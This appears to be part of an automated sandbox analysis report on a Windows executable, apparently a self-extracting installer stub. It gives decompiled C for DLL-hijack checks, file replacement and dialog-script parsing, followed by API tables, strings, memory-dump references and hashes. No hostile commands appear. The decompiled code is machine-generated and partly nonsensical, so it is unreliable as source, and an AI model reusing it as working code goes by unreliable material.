					_a200 = L"wkscli.dll";
					_a204 = L"dfscli.dll";
					_a208 = L"browcli.dll";
					_a212 = L"rasadhlp.dll";
					_a216 = L"dhcpcsvc6.dll";
					_a220 = L"dhcpcsvc.dll";
					_a224 = L"XmlLite.dll";
					_a228 = L"linkinfo.dll";
					_a232 = L"cryptsp.dll";
					_a236 = L"RpcRtRemote.dll";
					_a240 = L"aclui.dll";
					_a244 = L"dsrole.dll";
					_a248 = L"peerdist.dll";
					if( *_t118 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a772, _t202);
						E0019FAB1( &_a9160, E0019B943(_t223,  &_a772), _t202);
						_t195 = 0;
						_t203 = 0;
						do {
							if(E0019A995() < 0x600) {
								_t126 = 0;
								__eflags = 0;
							} else {
								_t126 = E0019FCFD( *((intOrPtr*)(_t210 + 0x18 + _t203 * 4))); // executed
							}
							if(_t126 == 0) {
								L20:
								_push(0x800);
								E0019B9B9(_t227,  &_a772,  *((intOrPtr*)(_t210 + 0x1c + _t203 * 4)));
								_t130 = GetFileAttributesW( &_a760); // executed
								if(_t130 != _t208) {
									_t195 =  *((intOrPtr*)(_t210 + 0x18 + _t203 * 4));
									L24:
									if(_v1 != 0) {
										L30:
										_t234 = _t195;
										if(_t195 == 0) {
											return _t130;
										}
										E0019B98D(_t234,  &_a768);
										if(E0019A995() < 0x600) {
											_push( &_a9160);
											_push( &_a768);
											E00193E41( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t195);
											_t210 = _t210 + 0x18;
											_t130 = AllocConsole();
											__eflags = _t130;
											if(_t130 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t141 = E001B2B33( &_a4860);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t141,  &_v4, 0);
												Sleep(0x2710);
												_t130 = FreeConsole();
											}
										} else {
											E0019FCFD(L"dwmapi.dll");
											E0019FCFD(L"uxtheme.dll");
											_push( &_a9152);
											_push( &_a760);
											E00193E41( &_a4852, 0x864, E0019DA42(_t185, 0xf1), _t195);
											_t210 = _t210 + 0x18;
											_t130 = E001A9735(0,  &_a4848, E0019DA42(_t185, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t205 = 0;
									while(1) {
										_push(0x800);
										E0019B9B9(0,  &_a768,  *((intOrPtr*)(_t210 + 0x3c + _t205 * 4)));
										_t130 = GetFileAttributesW( &_a756);
										if(_t130 != _t208) {
											break;
										}
										_t205 = _t205 + 1;
										if(_t205 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t195 =  *((intOrPtr*)(_t210 + 0x38 + _t205 * 4));
									goto L30;
								}
							} else {
								_t130 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x24 + _t203 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t130 - 2;
								if(_t130 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t203 = _t203 + 1;
						} while (_t203 < 8);
						goto L24;
					}
					_t197 = E001B6662(_t185, _t118);
					_pop(_t185);
					if(_t197 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4868, 0x800);
					_t206 = CreateFileW( &_a4868, 0x80000000, 1, 0, 3, 0, 0);
					if(_t206 == _t208 || SetFilePointer(_t206, _t197, 0, 0) != _t197) {
						L13:
						CloseHandle(_t206);
						_t202 = 0x800;
						goto L14;
					} else {
						_t167 = ReadFile(_t206,  &_a13260, 0x7ffe,  &_a4, 0);
						_t222 = _t167;
						if(_t167 == 0) {
							goto L13;
						}
						_t185 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
						_push( &_a252);
						_push( &_a13260);
						while(1) {
							_t198 = E0019F835(_t222);
							_t223 = _t198;
							if(_t198 == 0) {
								goto L13;
							}
							E0019FCFD( &_a252);
							_push(0x104);
							_push( &_a248);
							_push(_t198);
						}
						goto L13;
					}
				}
				_t176 = GetProcAddress(_t201, "SetDllDirectoryW");
				_t184 = _a46032;
				if(_t176 != 0) {
					asm("sbb ecx, ecx");
					_t185 =  ~(_t184 & 0x000000ff) & 0x001c22e4;
					 *_t176( ~(_t184 & 0x000000ff) & 0x001c22e4);
				}
				_t177 = GetProcAddress(_t201, "SetDefaultDllDirectories");
				if(_t177 != 0) {
					_t185 = ((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000;
					 *_t177(((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					_v1 = 1;
				}
				goto L5;
			}

0x0019fd4e
0x0019fd54
0x0019fd5c
0x0019fd67
0x0019fd6b
0x0019fdbe
0x0019fdbe
0x0019fdc3
0x0019fdcc
0x0019fdd1
0x0019fdd9
0x0019fde4
0x0019fdec
0x0019fdf4
0x0019fdfc
0x0019fe04
0x0019fe0c
0x0019fe14
0x0019fe1c
0x0019fe24
0x0019fe2c
0x0019fe34
0x0019fe3c
0x0019fe44
0x0019fe4c
0x0019fe54
0x0019fe5c
0x0019fe64
0x0019fe6c
0x0019fe74
0x0019fe7c
0x0019fe84
0x0019fe8c
0x0019fe94
0x0019fe9c
0x0019fea4
0x0019feaf
0x0019feba
0x0019fec5
0x0019fed0
0x0019fedb
0x0019fee6
0x0019fef1
0x0019fefc
0x0019ff07
0x0019ff12
0x0019ff1d
0x0019ff28
0x0019ff33
0x0019ff3e
0x0019ff49
0x0019ff54
0x0019ff5f
0x0019ff6a
0x0019ff75
0x0019ff80
0x0019ff8b
0x0019ff96
0x0019ffa1
0x0019ffac
0x0019ffb7
0x0019ffc2
0x0019ffcd
0x0019ffd8
0x0019ffe3
0x0019ffee
0x0019fff9
0x001a0004
0x001a000f
0x001a001a
0x001a0025
0x001a00f3
0x001a00fe
0x001a0117
0x001a0122
0x001a0124
0x001a0126
0x001a0130
0x001a013d
0x001a013d
0x001a0132
0x001a0136
0x001a0136
0x001a0141
0x001a0163
0x001a0163
0x001a0174
0x001a0181
0x001a0185
0x001a018f
0x001a0193
0x001a0198
0x001a01cc
0x001a01cc
0x001a01ce
0x001a02e5
0x001a02e5
0x001a01dc
0x001a01eb
0x001a025a
0x001a0262
0x001a0276
0x001a027b
0x001a027e
0x001a0284
0x001a0286
0x001a028f
0x001a02a4
0x001a02bc
0x001a02c7
0x001a02cd
0x001a02cd
0x001a01ed
0x001a01f2
0x001a01fc
0x001a0208
0x001a0210
0x001a022a
0x001a022f
0x001a0249
0x001a0249
0x001a02d5
0x001a02d5
0x001a019a
0x001a019c
0x001a019c
0x001a01ad
0x001a01ba
0x001a01be
0x00000000
0x00000000
0x001a01c0
0x001a01c4
0x00000000
0x00000000
0x00000000
0x001a01c6
0x001a01c8
0x00000000
0x001a01c8
0x001a0143
0x001a0158
0x001a015e
0x001a0161
0x00000000
0x00000000
0x00000000
0x001a0161
0x001a0187
0x001a0187
0x001a0188
0x00000000
0x001a018d
0x001a0031
0x001a0033
0x001a0036
0x00000000
0x00000000
0x001a0047
0x001a0065
0x001a0069
0x001a00e7
0x001a00e8
0x001a00ee
0x00000000
0x001a007b
0x001a0090
0x001a0096
0x001a0098
0x00000000
0x00000000
0x001a00a0
0x001a00a2
0x001a00a7
0x001a00b6
0x001a00be
0x001a00dc
0x001a00e1
0x001a00e3
0x001a00e5
0x00000000
0x00000000
0x001a00c9
0x001a00ce
0x001a00da
0x001a00db
0x001a00db
0x00000000
0x001a00dc
0x001a0069
0x0019fd79
0x0019fd7b
0x0019fd84
0x0019fd8b
0x0019fd8d
0x0019fd94
0x0019fd94
0x0019fd9c
0x0019fda0
0x0019fdb0
0x0019fdb7
0x0019fdb9
0x0019fdb9
0x00000000

APIs

GetModuleHandleW.KERNEL32 ref: 0019FD61
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0019FD79
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0019FD9C
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001A0047
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001A005F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 001A0071
ReadFile.KERNEL32(00000000,?,00007FFE,001C28D4,00000000), ref: 001A0090
CloseHandle.KERNEL32(00000000), ref: 001A00E8
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001A00FE
CompareStringW.KERNELBASE(00000400,00001001,001C2920,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 001A0158
GetFileAttributesW.KERNELBASE(?,?,001C28EC,00000800,?,00000000,?,00000800), ref: 001A0181
GetFileAttributesW.KERNEL32(?,?,001C29AC,00000800), ref: 001A01BA

Part of subcall function 0019FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0019FD18
Part of subcall function 0019FCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0019E7F6,Crypt32.dll,?,0019E878,?,0019E85C,?,?,?,?), ref: 0019FD3A

_swprintf.LIBCMT ref: 001A022A
_swprintf.LIBCMT ref: 001A0276

Part of subcall function 00193E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00193E54

AllocConsole.KERNEL32 ref: 001A027E
GetCurrentProcessId.KERNEL32 ref: 001A0288
AttachConsole.KERNEL32(00000000), ref: 001A028F
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 001A02B5
WriteConsoleW.KERNEL32(00000000), ref: 001A02BC
Sleep.KERNEL32(00002710), ref: 001A02C7
FreeConsole.KERNEL32 ref: 001A02CD
ExitProcess.KERNEL32 ref: 001A02D5

Strings

DXGIDebug.dll, xrefs: 0019FDD9, 001A0144
uxtheme.dll, xrefs: 001A01F7
SetDefaultDllDirectories, xrefs: 0019FD96
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 001A0264
dwmapi.dll, xrefs: 0019FE04, 001A01ED
SetDllDirectoryW, xrefs: 0019FD73
kernel32, xrefs: 0019FD57

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: b8677bfa28c1425567493b2310c77e123a0271cc2d9d673883dfa2ff0a0e2924
Instruction ID: fdb958b9aeb9c9e351c2a2827e9829d3e0c7f1a965ddf6356247e11fd50612fb
Opcode Fuzzy Hash: b8677bfa28c1425567493b2310c77e123a0271cc2d9d673883dfa2ff0a0e2924
Instruction Fuzzy Hash: 2AD17DB1008384ABD735DF50C949FDFBBE8BBA5704F50491DF589AA240CBB0C549CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 001AB4C7, Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438
windowfileCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E001AB4C7(void* __edx) {
				intOrPtr _t215;
				void* _t220;
				intOrPtr _t278;
				void* _t291;
				WCHAR* _t293;
				void* _t296;
				WCHAR* _t297;
				void* _t302;

				_t291 = __edx;
				E001AD870(E001C150B, _t302);
				_t215 = 0x1bc80;
				E001AD940();
				if( *((intOrPtr*)(_t302 + 0xc)) == 0) {
					L169:
					 *[fs:0x0] =  *((intOrPtr*)(_t302 - 0xc));
					return _t215;
				}
				_push(0x1000);
				_push(_t302 - 0xe);
				_push(_t302 - 0xd);
				_push(_t302 - 0x5c84);
				_push(_t302 - 0xfc8c);
				_push( *((intOrPtr*)(_t302 + 0xc)));
				_t215 = E001AA156();
				 *((intOrPtr*)(_t302 + 0xc)) = 0x1bc80;
				if(0x1bc80 != 0) {
					_t278 =  *((intOrPtr*)(_t302 + 0x10));
					do {
						_t220 = _t302 - 0x5c84;
						_t296 = _t302 - 0x1bc8c;
						_t293 = 6;
						goto L4;
						L6:
						while(E001A1410(_t302 - 0xfc8c,  *((intOrPtr*)(0x1cd618 + _t297 * 4))) != 0) {
							_t297 =  &(_t297[0]);
							if(_t297 < 0xe) {
								continue;
							} else {
								goto L167;
							}
						}
						if(_t297 > 0xd) {
							goto L167;
						}
						switch( *((intOrPtr*)(_t297 * 4 +  &M001AC0D7))) {
							case 0:
								__eflags = _t278 - 2;
								if(_t278 != 2) {
									goto L167;
								}
								_t299 = 0x800;
								E001A95F8(_t302 - 0x7c84, 0x800);
								E0019A188(E0019B625(_t302 - 0x7c84, _t302 - 0x5c84, _t302 - 0xdc8c, 0x800), _t278, _t302 - 0x8c8c, 0x800);
								 *(_t302 - 4) = _t293;
								E0019A2C2(_t302 - 0x8c8c, _t302 - 0xdc8c);
								E00196EF9(_t302 - 0x3c84);
								_push(_t293);
								_t286 = _t302 - 0x8c8c;
								_t238 = E0019A215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
								__eflags = _t238;
								if(_t238 == 0) {
									L28:
									 *(_t302 - 4) =  *(_t302 - 4) | 0xffffffff;
									E0019A19E(_t302 - 0x8c8c);
									goto L167;
								} else {
									goto L15;
									L16:
									E0019B1B7(_t286, __eflags, _t302 - 0x7c84, _t302 - 0x103c, _t299);
									E0019AEA5(__eflags, _t302 - 0x103c, _t299);
									_t301 = E001B2B33(_t302 - 0x7c84);
									__eflags = _t301 - 4;
									if(_t301 < 4) {
										L18:
										_t266 = E0019B5E5(_t302 - 0x5c84);
										__eflags = _t266;
										if(_t266 != 0) {
											goto L28;
										}
										L19:
										_t268 = E001B2B33(_t302 - 0x3c84);
										__eflags = 0;
										 *((short*)(_t302 + _t268 * 2 - 0x3c82)) = 0;
										E001AE920(_t293, _t302 - 0x3c, _t293, 0x1e);
										_t304 = _t304 + 0x10;
										 *((intOrPtr*)(_t302 - 0x38)) = 3;
										_push(0x14);
										_pop(_t271);
										 *((short*)(_t302 - 0x2c)) = _t271;
										 *((intOrPtr*)(_t302 - 0x34)) = _t302 - 0x3c84;
										_push(_t302 - 0x3c);
										 *0x1cdef4();
										goto L20;
									}
									_t276 = E001B2B33(_t302 - 0x103c);
									__eflags = _t301 - _t276;
									if(_t301 > _t276) {
										goto L19;
									}
									goto L18;
									L20:
									_t243 = GetFileAttributesW(_t302 - 0x3c84);
									__eflags = _t243 - 0xffffffff;
									if(_t243 == 0xffffffff) {
										L27:
										_push(_t293);
										_t286 = _t302 - 0x8c8c;
										_t245 = E0019A215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
										__eflags = _t245;
										if(_t245 != 0) {
											_t299 = 0x800;
											L15:
											SetFileAttributesW(_t302 - 0x3c84, _t293);
											__eflags =  *((char*)(_t302 - 0x2c78));
											if(__eflags == 0) {
												goto L20;
											}
											goto L16;
										}
										goto L28;
									}
									_t247 = DeleteFileW(_t302 - 0x3c84);
									__eflags = _t247;
									if(_t247 != 0) {
										goto L27;
									} else {
										_t300 = _t293;
										_push(_t293);
										goto L24;
										L24:
										E00193E41(_t302 - 0x103c, 0x800, L"%s.%d.tmp", _t302 - 0x3c84);
										_t304 = _t304 + 0x14;
										_t252 = GetFileAttributesW(_t302 - 0x103c);
										__eflags = _t252 - 0xffffffff;
										if(_t252 != 0xffffffff) {
											_t300 = _t300 + 1;
											__eflags = _t300;
											_push(_t300);
											goto L24;
										} else {
											_t255 = MoveFileW(_t302 - 0x3c84, _t302 - 0x103c);
											__eflags = _t255;
											if(_t255 != 0) {
												MoveFileExW(_t302 - 0x103c, _t293, 4);
											}
											goto L27;
										}
									}
								}
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax = E001B2B33(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0x1ece0c);
									__eax = E001B2B5E(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										 *0x1ece0c = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										__eax = E001B66ED(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L001B2B4E(__esi);
									}
								}
								goto L167;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
								}
								goto L167;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L167;
								}
								__eflags =  *0x1d9602 - __di;
								if( *0x1d9602 != __di) {
									goto L167;
								}
								__eax = 0;
								__edi = __ebp - 0x5c84;
								_push(0x22);
								 *(__ebp - 0x103c) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x5c84) - __ax;
								if( *(__ebp - 0x5c84) == __ax) {
									__edi = __ebp - 0x5c82;
								}
								__eax = E001B2B33(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L167;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L54:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L66:
											__ebp - 0x103c = E0019FAB1(__ebp - 0x103c, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L67:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x103c;
											__eax = E001B0D9B(__ebp - 0x103c, __ebp - 0x103c);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
												if( *((intOrPtr*)(__eax + 2)) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x103c;
											__edi = 0x1d9602;
											E0019FAB1(0x1d9602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
											__eax = E001A9FFC(__ebp - 0x103c, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
											__ebx =  *0x1cdf7c;
											__eax = SendMessageW(__esi, 0x143, __ebx, 0x1d9602); // executed
											__eax = __ebp - 0x103c;
											__eax = E001B2B69(__ebp - 0x103c, 0x1d9602, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x103c = 0;
												__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
											}
											goto L167;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L57:
											__eax = __ebp - 0x18;
											__ebx = 0;
											_push(__ebp - 0x18);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0x1cdea8();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x103c;
												_push(__ebp - 0x103c);
												__eax = __ebp - 0x1c;
												_push(__ebp - 0x1c);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x18));
												__eax =  *0x1cdea4();
												_push( *(__ebp - 0x18));
												 *0x1cde84() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x103c) = __cx;
											}
											__eflags =  *(__ebp - 0x103c) - __bx;
											if( *(__ebp - 0x103c) != __bx) {
												__eax = __ebp - 0x103c;
												__eax = E001B2B33(__ebp - 0x103c);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x103c = E0019FA89(__eflags, __ebp - 0x103c, "\\", __esi);
												}
											}
											__esi = E001B2B33(__edi);
											__eax = __ebp - 0x103c;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x103c = E0019FA89(__eflags, __ebp - 0x103c, __edi, 0x800);
											}
											goto L67;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L66;
										}
										goto L57;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L54;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L167;
									} else {
										__ebp - 0x103c = E0019FAB1(__ebp - 0x103c, __edi, 0x800);
										goto L67;
									}
								}
							case 4:
								__eflags =  *0x1d95fc - 1;
								__eflags = __eax - 0x1d95fc;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__ebx + 6) & __bl;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L84:
									 *0x1d75d2 = __cl;
									 *0x1d75d3 = 1;
									goto L167;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0x1d75d2 = __cl;
									L83:
									 *0x1d75d3 = __cl;
									goto L167;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L84;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L167;
								}
								 *0x1d75d2 = 1;
								goto L83;
							case 6:
								__eflags = __ebx - 4;
								if(__ebx != 4) {
									goto L94;
								}
								__eax = __ebp - 0x5c84;
								__eax = E001B2B69(__ebp - 0x5c84, __eax, L"<>");
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L94;
								}
								_push(__edi);
								goto L93;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									L115:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0x1d95fc;
										if( *0x1d95fc == 0) {
											 *0x1d95fc = 2;
										}
										 *0x1d85f8 = 1;
									}
									goto L167;
								}
								__eax = __ebp - 0x7c84;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
								E0019AEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0x1cd5f8);
									__ebp - 0x7c84 = E00193E41(0x1d85fa, __edi, L"%s%s%u", __ebp - 0x7c84);
									__eax = E00199E6B(0x1d85fa);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x1d85fa);
								__eflags =  *(__ebp - 0x5c84);
								if( *(__ebp - 0x5c84) == 0) {
									goto L167;
								}
								__eflags =  *0x1e5d02;
								if( *0x1e5d02 != 0) {
									goto L167;
								}
								__eax = 0;
								 *(__ebp - 0x143c) = __ax;
								__eax = __ebp - 0x5c84;
								_push(0x2c);
								_push(__ebp - 0x5c84);
								__eax = E001B0BB8(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L111:
									__eflags =  *(__ebp - 0x143c);
									if( *(__ebp - 0x143c) == 0) {
										__ebp - 0x1bc8c = __ebp - 0x5c84;
										E0019FAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
										__ebp - 0x143c = E0019FAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
									}
									__ebp - 0x5c84 = E001A9C4F(__ebp - 0x5c84);
									__eax = 0;
									 *(__ebp - 0x4c84) = __ax;
									__ebp - 0x143c = __ebp - 0x5c84;
									__eax = E001A9735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
									__eflags = __eax - 6;
									if(__eax == 6) {
										goto L167;
									} else {
										__eax = 0;
										__eflags = 0;
										 *0x1d75d7 = 1;
										 *0x1d85fa = __ax;
										__eax = EndDialog( *(__ebp + 8), 1);
										goto L115;
									}
								}
								__edx = 0;
								__esi = 0;
								__eflags =  *(__ebp - 0x5c84) - __dx;
								if( *(__ebp - 0x5c84) == __dx) {
									goto L111;
								}
								__ecx = 0;
								__eax = __ebp - 0x5c84;
								while(1) {
									__eflags =  *__eax - 0x40;
									if( *__eax == 0x40) {
										break;
									}
									__esi =  &(__esi->i);
									__eax = __ebp - 0x5c84;
									__ecx = __esi + __esi;
									__eax = __ebp - 0x5c84 + __ecx;
									__eflags =  *__eax - __dx;
									if( *__eax != __dx) {
										continue;
									}
									goto L111;
								}
								__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
								__ebp - 0x143c = E0019FAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x5c84) = __ax;
								goto L111;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x5c84) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x5c84;
										_push(__ebp - 0x5c84);
										__eax = E001B668C(__ebx, __edi);
										_pop(__ecx);
										 *0x1ede1c = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0x1ede18 = E001AA2AE(__ecx, __edx, __eflags);
								}
								 *0x1e5d03 = 1;
								goto L167;
							case 9:
								__eflags = __ebx - 5;
								if(__ebx != 5) {
									L94:
									 *0x1ede20 = 1;
									goto L167;
								}
								_push(1);
								L93:
								__eax = __ebp - 0x5c84;
								_push(__ebp - 0x5c84);
								_push( *(__ebp + 8));
								__eax = E001AC431();
								goto L94;
							case 0xa:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L167;
								}
								__eax = 0;
								 *(__ebp - 0x2c3c) = __ax;
								__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
								__eax = E001B59C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
								_push(0x800);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									_push(0x1ead0a);
									__eax = __ebp - 0x2c3c;
									_push(__ebp - 0x2c3c);
									__eax = E0019FAB1();
									 *(__ebp - 0x14) = 2;
								} else {
									__eflags = __eax - 0x54;
									__eax = __ebp - 0x2c3c;
									if(__eflags == 0) {
										_push(0x1e9d0a);
										_push(__eax);
										__eax = E0019FAB1();
										 *(__ebp - 0x14) = 7;
									} else {
										_push(0x1ebd0a);
										_push(__eax);
										__eax = E0019FAB1();
										 *(__ebp - 0x14) = 0x10;
									}
								}
								__eax = 0;
								 *(__ebp - 0x9c8c) = __ax;
								 *(__ebp - 0x1c3c) = __ax;
								__ebp - 0x19c8c = __ebp - 0x6c84;
								__eax = E001B4D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
								_pop(__ecx);
								_pop(__ecx);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x6c84) - __bx;
								if( *(__ebp - 0x6c84) != __bx) {
									__ebp - 0x6c84 = E00199E6B(__ebp - 0x6c84);
									__eflags = __al;
									if(__al != 0) {
										goto L152;
									}
									__ebx = __edi;
									__esi = __ebp - 0x6c84;
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) == __bx) {
										goto L152;
									}
									_push(0x20);
									_pop(__ecx);
									do {
										__eax = __esi->i & 0x0000ffff;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L140:
											__edi = __eax;
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x6c84 = E00199E6B(__ebp - 0x6c84);
											__eflags = __al;
											if(__al == 0) {
												__esi->i = __di;
												L148:
												_push(0x20);
												_pop(__ecx);
												__edi = 0;
												__eflags = 0;
												goto L149;
											}
											_push(0x2f);
											_pop(__eax);
											__ebx = __esi;
											__eflags = __di - __ax;
											if(__di != __ax) {
												_push(0x20);
												_pop(__eax);
												do {
													__esi =  &(__esi->i);
													__eflags = __esi->i - __ax;
												} while (__esi->i == __ax);
												_push(__esi);
												__eax = __ebp - 0x1c3c;
												L146:
												_push(__eax);
												__eax = E001B4D7E();
												_pop(__ecx);
												_pop(__ecx);
												 *__ebx = __di;
												goto L148;
											}
											 *(__ebp - 0x1c3c) = __ax;
											__eax =  &(__esi->i);
											_push( &(__esi->i));
											__eax = __ebp - 0x1c3a;
											goto L146;
										}
										_push(0x2f);
										_pop(__edx);
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L149;
										}
										goto L140;
										L149:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __di;
									} while (__esi->i != __di);
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										__eflags = 0;
										 *__ebx = __ax;
									}
									goto L152;
								} else {
									__ebp - 0x19c8a = __ebp - 0x6c84;
